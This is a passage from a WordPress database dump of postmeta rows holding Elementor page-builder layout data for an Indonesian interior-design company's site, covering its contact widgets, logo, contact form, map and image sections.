11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4539,4973,'_elementor_page_assets','a:0:{}'),(4540,4973,'_elementor_pro_version','3.8.1'),(4541,4973,'_elementor_css','a:6:{s:4:\"time\";i:1695377195;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:7:\"ovaicon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4542,4974,'_wp_page_template','elementor_header_footer'),(4543,4974,'_elementor_edit_mode','builder'),(4544,4974,'_elementor_template_type','wp-page'),(4545,4974,'_elementor_version','3.8.1'),(4546,4974,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Saatnya Impian Anda Menjadi Kenyataan!\",\"description\":\"Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini temukan clarity kebutuhan kenyamanan Anda dan mulailah perjalanan menuju interior yang menginspirasi!\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4547,4974,'_elementor_page_assets','a:0:{}'),(4548,4974,'_elementor_pro_version','3.8.1'),(4549,4974,'_elementor_css','a:6:{s:4:\"time\";i:1695377195;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:7:\"ovaicon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4551,4975,'_wp_page_template','elementor_header_footer'),(4552,4975,'_elementor_edit_mode','builder'),(4553,4975,'_elementor_template_type','wp-page'),(4554,4975,'_elementor_version','3.8.1');
INSERT INTO `wpev_postmeta` VALUES (4555,4975,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/m